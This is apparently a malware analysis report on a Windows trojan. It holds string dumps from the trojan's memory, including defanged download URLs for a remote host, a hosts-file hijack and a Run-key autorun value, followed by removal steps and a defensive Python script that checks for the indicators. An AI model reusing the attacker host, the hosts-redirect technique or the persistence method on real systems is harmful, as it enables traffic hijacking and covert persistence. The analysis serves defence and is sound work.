,/!/4"14"36%5:&8=$9=#=D&@G'BL)DN,HO.JQ/KR1MT2NU3OV3OV5QX4QX7SZ6R\6R\7SY7SY7SZ7SY5QW4PV4PW3OY4OY3NX3NX4OY4PW4PV4PV3OV4PW6RY7SZ6RY7SZ7SZ7SZ6RY6RY5QX4PW4NZ4QX4OY3OY3PW5RY4PW3PW3OY3PW4PW7SY7SZ7SZ7SZ7SZ7SZ7SZ6RY4PV4PV4PV4PW4PV2OV3PW3PV3PW4PV4PW3PW3PW3PW4PW4PW5QX7SZ7SZ8TZ8TZ7SY7SY8T[6Q[/JT3PW1QV7Q].KQ
&CR(CW'AQ DT*BT.EU)GS*DQ*CS'@R*DQ
.Xu1GY.KZ.I]
.GY1GY-IZ*IX&?O
$$$&&&###"""$$$
...###@@@...YYY
***,,,000
///...   
!!!111000555444\\\
###222777
)))444666999444
999777;;;888
666555!!!
666...888;;;[[[
888:::===???
666222;;;???^^^
Ýdlllnnnlllkkklllmmmlllmmmmmmkkkkkklllmmmmmmmmmnnnnnnkkknnnmmmkkkmmmuuu
}}}___```
$$$%%%$$$%%%$$$
\\\hhhppp111''' *** ===...ZZZ
}}}---,,,
(7),01444
'9=82<.342
9T.mn,
%fkk4
{`.cF
-.VU2
1975/08/21
, #&')*)
-0-(0%()(
.In4i.o-
1900/01/01
2007:02:07 02:59:30
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
MPR.dll
VERSION.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
\\.\Scsi0:
\\.\PhysicalDrive0
%s:%d
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
(*.htm;*.html)|*.htm;*.html
its:%s::%s
x86 Family %s Model %s Stepping %s
X-X-X-X
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
c:\%original file name%.exe
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
#include "l.chs\afxres.rc" // Standard components
WinExec
RegCreateKeyA
RegCreateKeyExA
GetViewportExtEx
GetViewportOrgEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetKeyState
GetKeyboardType
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
1.0.0.0
windowswf
@api-ms-win-core-synch-l1-2-0.dll
mscoree.dll
ext-ms-win-ntuser-windowstation-l1-1-0
portuguese-brazilian
\SYSTEM\CurrentControlSet\Services\%s
\Drivers\*.sys
1.0.0.1
_ChangePassword
(*.*)

2bcd58.exe_3416:

`.rsrc
t$(SSh
~%UVW
u$SShe
Jiu2.iup
1wK(.wS
user32.dll
kernel32.dll
Kernel32.dll
OLEACC.DLL
ws2_32.dll
TCPHeader
windowswf
hXXp://VVV.hqkjwy.com:88/hosts1.txt
%System%\drivers\etc\hosts
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
hXXp://VVV.hqkjwy.com:88/dk.txt
@SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
z>Windows 2000
@Windows XP
@Windows 2003
@Windows Vista
@Windows 7
@Windows 8
WinHttp.WinHttpRequest.5.1
HTTP/1.1
hXXp://
iexplore.exe
liebao.exe
maxthon.exe
360se.exe
2345Explorer.exe|2345EX~1.EXE
firefox.exe
hao123Juzi.exe
SogouExplorer.exe
QQBrowser.exe
opera.exe
TaoBrowser.exe
Chrome_OmniboxView
TangoWeb.exe
TheWorld.exe
UCBrowser.exe
baidubrowser.exe
360chrome.exe
TTraveler.exe
|liebao.exe|vary.exe|went.exe|miniie.exe|cpopmus32ex.exe|crowd.exe|slowt32ex.exe|
f1browser.exe
2345chrome.exe
chrome.exe
&7http
VBScript.RegExp
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
packet.dll
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
;3 #>6.&
'2, / 0&7!4-)1#
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\Windows\system32\2bcd58.exe
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
WinExec
GetProcessHeap
RegCloseKey
RegOpenKeyExA
RegCreateKeyA
RegDeleteKeyA
RegCreateKeyExA
GetViewportExtEx
GetViewportOrgEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
ShellExecuteA
GetKeyState
SetWindowsHookExA
UnhookWindowsHookEx
GetKeyboardLayout
VkKeyScanExA
keybd_event
CreateDialogIndirectParamA
InternetCanonicalizeUrlA
InternetCrackUrlA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
.text
`.rdata
@.data
.rsrc
UrlA3%
}.mKK;
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PAD
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
RASAPI32.dll
SHELL32.dll
USER32.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)
1.0.0.0

2bcd58.exe_3416_rwx_00401000_000EF000:

t$(SSh
~%UVW
u$SShe
Jiu2.iup
1wK(.wS
user32.dll
kernel32.dll
Kernel32.dll
OLEACC.DLL
ws2_32.dll
TCPHeader
windowswf
hXXp://VVV.hqkjwy.com:88/hosts1.txt
%System%\drivers\etc\hosts
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
hXXp://VVV.hqkjwy.com:88/dk.txt
@SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
z>Windows 2000
@Windows XP
@Windows 2003
@Windows Vista
@Windows 7
@Windows 8
WinHttp.WinHttpRequest.5.1
HTTP/1.1
hXXp://
iexplore.exe
liebao.exe
maxthon.exe
360se.exe
2345Explorer.exe|2345EX~1.EXE
firefox.exe
hao123Juzi.exe
SogouExplorer.exe
QQBrowser.exe
opera.exe
TaoBrowser.exe
Chrome_OmniboxView
TangoWeb.exe
TheWorld.exe
UCBrowser.exe
baidubrowser.exe
360chrome.exe
TTraveler.exe
|liebao.exe|vary.exe|went.exe|miniie.exe|cpopmus32ex.exe|crowd.exe|slowt32ex.exe|
f1browser.exe
2345chrome.exe
chrome.exe
&7http
VBScript.RegExp
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
packet.dll
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
;3 #>6.&
'2, / 0&7!4-)1#
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\Windows\system32\2bcd58.exe
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
WinExec
GetProcessHeap
RegCloseKey
RegOpenKeyExA
RegCreateKeyA
RegDeleteKeyA
RegCreateKeyExA
GetViewportExtEx
GetViewportOrgEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
ShellExecuteA
GetKeyState
SetWindowsHookExA
UnhookWindowsHookEx
GetKeyboardLayout
VkKeyScanExA
keybd_event
CreateDialogIndirectParamA
InternetCanonicalizeUrlA
InternetCrackUrlA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
.text
`.rdata
@.data
.rsrc
(*.*)


Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan the system with an anti-rootkit tool. The strings recovered from memory reference kernel drivers (SafeWall.sys, SafeWall64.sys, UnlockCallback.sys, UnlockCallback_x64.sys under %System%\drivers) and a service key under \SYSTEM\CurrentControlSet\Services\, so also check for a driver service registered for any of these names.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    29c2bf.exe:1480
    2bcd58.exe:3416 (the autorun component; see the Run value in step 5)

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Config[1].rar (230 bytes)
    C:\Windows\System32\drivers\UnlockCallback.sys (5 bytes)
    C:\Windows\Temp\1.sys.rar (1810 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\SafeWall[1].rar (2765 bytes)
    C:\Windows\Temp\Config.dat (230 bytes)
    C:\Windows\System32\2bcd58.exe (678 bytes)
    C:\Windows\29c2bf.exe (586 bytes)
    C:\Windows\System32\drivers\etc\hosts (826 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "windowswf" = "C:\Windows\system32\2bcd58.exe"

  6. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts). The Trojan replaces it with hosts1.txt downloaded from hqkjwy.com:88, so remove every uncommented entry that maps a host name to a non-loopback address. A clean Windows 7 hosts file contains only comment lines; at most it should hold:
    127.0.0.1 localhost
  7. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  8. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
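The manual steps above check three things by hand: the hijacked HOSTS file, the "windowswf" Run value and the dropped files. The following script automates those checks offline against artefacts collected from a suspect machine. It is an added example, not part of the Lavasoft report, and it assumes the hosts file text, an export of the Run key (value name to command) and a file listing have already been gathered; the sample inputs at the bottom are constructed for illustration (the hijack IPs are TEST-NET addresses, not the real redirect targets, which the report does not record).

```python
"""Offline triage for the IOCs in the Trojan.Win32.FlyStudio_b6e34f92da report.

Added example (not the report's own tooling). Inputs are plain data so the
checks can be run against artefacts copied off a suspect host.
"""
import ipaddress
import re

# Indicators taken from the report: autorun value, dropped files, drivers.
AUTORUN_NAME = "windowswf"
AUTORUN_TARGET = r"c:\windows\system32\2bcd58.exe"
DROPPED_FILES = {
    r"c:\windows\system32\2bcd58.exe",
    r"c:\windows\29c2bf.exe",
    r"c:\windows\system32\drivers\unlockcallback.sys",
    r"c:\windows\syswow64\drivers\unlockcallback_x64.sys",
    r"c:\windows\system32\safewall.sys",
    r"c:\windows\system32\drivers\safewall.sys",
    r"c:\windows\temp\1.sys.rar",
    r"c:\windows\temp\1.key.rar",
    r"c:\windows\temp\config.dat",
}
LOOPBACK = {ipaddress.ip_address("127.0.0.1"), ipaddress.ip_address("::1")}


def parse_hosts(text):
    """Return (ip, [hostnames]) for every active (uncommented) hosts entry."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # not a hosts entry (garbage line)
        entries.append((ip, parts[1:]))
    return entries


def suspicious_hosts_entries(text):
    """Active hosts entries that do not point at loopback.

    A default Windows 7 hosts file has every line commented out, so any
    uncommented entry resolving a name to a non-loopback address is worth a
    look; this is how a downloaded hosts1.txt redirects the game-site domains
    seen in the dump to a server of the attacker's choosing.
    """
    return [(str(ip), names) for ip, names in parse_hosts(text)
            if ip not in LOOPBACK]


def check_run_values(run_values):
    """run_values: dict of value name -> command from HKLM\\...\\CurrentVersion\\Run.

    Flags the report's autorun value by name or target, and also any entry
    that launches a 6-hex-character .exe from the Windows directory, the
    naming pattern of both droppers (29c2bf.exe, 2bcd58.exe).
    """
    hits = []
    rand_exe = re.compile(r"^c:\\windows\\(system32\\)?[0-9a-f]{6}\.exe$", re.I)
    for name, cmd in run_values.items():
        target = cmd.strip().strip('"').lower()
        if name.lower() == AUTORUN_NAME or target == AUTORUN_TARGET:
            hits.append((name, cmd, "report IOC"))
        elif rand_exe.match(target):
            hits.append((name, cmd, "random 6-hex-char dropper name"))
    return hits


def dropped_files_present(paths):
    """Report's dropped-file paths that appear in the collected listing."""
    present = {p.lower() for p in paths}
    return sorted(DROPPED_FILES & present)


# Constructed sample artefacts (not captured from a real infection).
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
# 127.0.0.1       localhost
127.0.0.1 localhost
203.0.113.5 www.sf999.com sf999.com   # constructed hijack line
198.51.100.7 45woool.com
"""
SAMPLE_RUN = {
    "windowswf": r'"C:\Windows\system32\2bcd58.exe"',
    "ExampleUpdater": r"C:\Program Files\Example\updater.exe",  # benign filler
}
SAMPLE_FILES = [
    r"C:\Windows\System32\drivers\UnlockCallback.sys",
    r"C:\Windows\System32\drivers\etc\hosts",
    r"C:\Windows\Temp\Config.dat",
]

if __name__ == "__main__":
    for ip, names in suspicious_hosts_entries(SAMPLE_HOSTS):
        print("hosts hijack:", ip, "->", ", ".join(names))
    for name, cmd, why in check_run_values(SAMPLE_RUN):
        print("autorun:", name, "=", cmd, f"({why})")
    for path in dropped_files_present(SAMPLE_FILES):
        print("dropped file present:", path)
```

The hosts check deliberately flags every non-loopback mapping rather than only the domains listed in the dump, because the downloaded hosts1.txt can contain any names; review the flagged lines before deleting them so legitimate corporate entries are kept.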
